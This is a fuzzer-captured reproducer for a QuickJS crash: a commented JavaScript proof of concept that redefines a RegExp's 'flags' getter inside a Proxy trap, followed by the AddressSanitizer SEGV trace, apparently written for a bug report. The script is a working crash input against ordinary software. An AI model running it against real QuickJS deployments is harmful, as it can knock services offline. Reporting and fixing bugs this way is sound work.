// Fuzzer-captured reproducer for the ASan SEGV logged below: QuickJS
// check_regexp_getter -> JS_IsCFunction faults after a RegExp's "flags"
// accessor is redefined with an undefined getter. The script is left
// byte-for-byte as captured; only comments are added.
// Presumably warms up the regexp code path first; whether this line is
// actually required for the crash is not established by the trace.
/a/.test("");
// The regexp whose "flags" property is clobbered from inside the trap.
const v0 = /x/g;
// Proxy handler. Its get trap runs on any property read through the proxy
// (js_proxy_get in the trace, frame #12).
const v1 = {
get(v2, v3) {
// v2 is the proxy target (v0). This installs an accessor property "flags"
// whose getter is undefined instead of a function; that is a legal
// descriptor, so the engine must tolerate a non-function getter here.
Object.defineProperty(v2, "flags", {get: undefined, configurable: true});
// Invoke RegExp.prototype[Symbol.replace] with v0 as `this` and no
// arguments. Per the trace this reaches js_regexp_Symbol_replace ->
// js_is_standard_regexp -> check_regexp_getter, which hands a getter value
// to JS_IsCFunction; the fault is a READ in the zero page, consistent with a
// non-object value being treated as an object pointer. NOTE(review):
// presumably that value is the undefined "flags" getter installed above —
// the frame does not name the property, so confirm in the source. The
// defensive expectation is that a getter is checked with JS_IsObject /
// JS_IsFunction before any JS_IsCFunction-style dereference.
/y/g[Symbol.replace].apply(v0);
}
};
// Wrap the regexp so a plain property read triggers the handler's get trap.
const v4 = new Proxy(v0, v1);
// Any property name fires the trap; "z" itself is arbitrary.
v4.z;
=================================================================
==3218064==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000006 (pc 0x563f754d1b5e bp 0x7ffd7f8bd8f0 sp 0x7ffd7f8bd8e0 T0)
==3218064==The signal is caused by a READ memory access.
==3218064==Hint: address points to the zero page.
#0 0x563f754d1b5e in JS_IsCFunction /home/fuzz/quickjs/quickjs.c:10576:21
#1 0x563f754d1b5e in check_regexp_getter /home/fuzz/quickjs/quickjs.c:48111:12
#2 0x563f754c90bb in js_is_standard_regexp /home/fuzz/quickjs/quickjs.c:48144:10
#3 0x563f754c90bb in js_regexp_Symbol_replace /home/fuzz/quickjs/quickjs.c:48194:31
#4 0x563f753e5150 in js_call_c_function /home/fuzz/quickjs/quickjs.c:17250:19
#5 0x563f75419079 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17445:16
#6 0x563f7548a810 in JS_Call /home/fuzz/quickjs/quickjs.c:20148:12
#7 0x563f7548a810 in js_function_apply /home/fuzz/quickjs/quickjs.c:40644:16
#8 0x563f753e5290 in js_call_c_function /home/fuzz/quickjs/quickjs.c:17263:19
#9 0x563f75419079 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17445:16
#10 0x563f7541c3e1 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17849:27
#11 0x563f754dd26d in JS_CallFree /home/fuzz/quickjs/quickjs.c:20155:19
#12 0x563f754dd26d in js_proxy_get /home/fuzz/quickjs/quickjs.c:50138:11
#13 0x563f754015e1 in JS_GetPropertyInternal /home/fuzz/quickjs/quickjs.c:7922:34
#14 0x563f7542e868 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:18786:13
#15 0x563f7543cab0 in JS_CallFree /home/fuzz/quickjs/quickjs.c:20155:19
#16 0x563f7543cab0 in JS_EvalFunctionInternal /home/fuzz/quickjs/quickjs.c:36578:19
#17 0x563f75457b9a in __JS_EvalInternal /home/fuzz/quickjs/quickjs.c:36711:19
#18 0x563f7543d61d in JS_EvalInternal /home/fuzz/quickjs/quickjs.c:36737:11
#19 0x563f7543d61d in JS_EvalThis /home/fuzz/quickjs/quickjs.c:36771:11
#20 0x563f7543d7e8 in JS_Eval /home/fuzz/quickjs/quickjs.c:36779:12
#21 0x563f753e2e7a in eval_buf /home/fuzz/quickjs/qjs.c:66:15
#22 0x563f753e2597 in eval_file /home/fuzz/quickjs/qjs.c:101:11
#23 0x563f753e2597 in main /home/fuzz/quickjs/qjs.c:519:17
#24 0x7f8923bc0d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#25 0x7f8923bc0e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#26 0x563f752fa714 in _start (/home/fuzz/quickjs/qjs+0x59714)
==3218064==Register values:
rax = 0x0000000000000000 rbx = 0x0000000000000000 rcx = 0x0000000000000000 rdx = 0x0000563f754c3a00
rdi = 0x0000000000000000 rsi = 0x0000000000000006 rbp = 0x00007ffd7f8bd8f0 rsp = 0x00007ffd7f8bd8e0
r8 = 0x0000000000000000 r9 = 0x0000000040000000 r10 = 0x00007c09230e5ef0 r11 = 0x0000000000000071
r12 = 0x00007b8921fe7780 r13 = 0x00000f7f2461ce78 r14 = 0x00007bf9230e73a6 r15 = 0x00000f7f2461ce74
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/quickjs/quickjs.c:10576:21 in JS_IsCFunction
==3218064==ABORTING
POC:
Step:
Crash: